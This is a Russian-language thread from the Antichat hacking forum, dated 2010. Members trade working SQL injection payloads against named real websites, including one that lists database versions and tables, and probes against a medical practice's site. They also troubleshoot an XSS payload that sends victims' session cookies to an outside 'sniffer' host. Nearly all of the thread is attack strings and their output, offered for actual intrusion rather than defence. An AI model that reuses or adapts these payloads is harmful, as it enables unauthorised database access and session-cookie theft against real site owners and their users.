ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
12.07.2010, 05:06
|
|
Постоянный
Регистрация: 28.12.2007
Сообщений: 328
Провел на форуме:
3054717
Репутация:
170
|
|
тупой вопрос, раньше их пропускал, а ща задумался.
Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?
|
|
|
12.07.2010, 05:11
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от zlo12
тупой вопрос, раньше их пропускал, а ща задумался.
Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?
смотря какой фильтр, все зависит от кода
|
|
|
|
12.07.2010, 06:15
|
|
Новичок
Регистрация: 10.07.2010
Сообщений: 8
Провел на форуме:
2597
Репутация:
0
|
|
http://www.jain4jain.com/profile_viewed_details.php?user_id=9843' union select 1,2,AES_DECRYPT(AES_ENCRYPT(group_concat(version() ),0x71),0x71),4,5--+
->5.0.91-community
http://www.jain4jain.com/profile_viewed_details.php?user_id=9843' union select 1,2,AES_DECRYPT(AES_ENCRYPT(group_concat(table_nam e),0x71),0x71),4,5 %20from%20information_schema.tables%20where%20tabl e_schema='jain4_jain4jain' limit 1,1--+
Не обуви стол?
|
|
|
|
12.07.2010, 06:41
|
|
Постоянный
Регистрация: 28.12.2007
Сообщений: 328
Провел на форуме:
3054717
Репутация:
170
|
|
что тут можно сделать? 9 алертов вылезает.
http://www.unsigned.com/scriptalertscript
|
|
|
|
12.07.2010, 10:26
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
Провел на форуме:
67694
Репутация:
5
|
|
Сообщение от R0nin
Вот например:
Код:
http://*.ru/archive.php?year=img=new+Image();img.src="http://*.ru/sniffer/s.gif?"%2bdocument.cookie;"
Залогинился, поставил галочку на "запомнить", потои прошел по такой урле, но все равно на сниффер ничего не пришло
Попробовал вторым способом, где ссылка на жаваскрипт, но все равно не получилось.
|
|
|
|
12.07.2010, 11:51
|
|
Новичок
Регистрация: 04.12.2005
Сообщений: 6
Провел на форуме:
27773
Репутация:
1
|
|
Dare
/showpost.php?p=2243791&postcount=14265
Попробовал
Код:
http://example.com/detail.php?id=-1+UNION+SELECT+1,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E),3,4,5+from+information_schema.columns+where+0x636F6C756D6E5F6E616D653D75736572--+
Все тот же результат. Не знаю уже, что и думать. Может какие-то обращения к некоторым таблицам из INFORMATION_SCHEMA как-то фильтруются?
|
|
|
|
12.07.2010, 12:11
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 26
Провел на форуме:
136979
Репутация:
53
|
|
Сообщение от Decoy
Dare
/showpost.php?p=2243791&postcount=14265
Попробовал
Код:
http://example.com/detail.php?id=-1+UNION+SELECT+1,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E),3,4,5+from+information_schema.columns+where+0x636F6C756D6E5F6E616D653D75736572--+
Все тот же результат. Не знаю уже, что и думать. Может какие-то обращения к некоторым таблицам из INFORMATION_SCHEMA как-то фильтруются?
Мб что просто нет к ней доступа (прав не хватает), но ты же грил что некоторые таблицы читал?
Без линка увы ни чем помочь не смогу, если что стучи в асю или ПМ
Последний пост на эту тему!
|
|
|
|
12.07.2010, 12:32
|
|
Новичок
Регистрация: 04.12.2005
Сообщений: 6
Провел на форуме:
27773
Репутация:
1
|
|
Dare
Ссылка выше.
Я думаю, если проблема в правах доступа, то сайт выдал бы ошибку (из-за нехватки аргументов), как если сделать select 1,2,3,4 вместо select 1,2,3,4,5.
PS Постучал по ICQ.
|
|
|
|
12.07.2010, 14:37
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от Boa
Залогинился, поставил галочку на "запомнить", потои прошел по такой урле, но все равно на сниффер ничего не пришло
Попробовал вторым способом, где ссылка на жаваскрипт, но все равно не получилось.
Надеюсь там есть уязвимость XSS-injection ?
Если что открой страницу кода и посмотри как он там передался.
|
|
|
|
12.07.2010, 18:59
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441
Репутация:
0
|
|
почему это не показывают, введенный номер?
http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6+--+
http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6 limit 0,1+--+
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
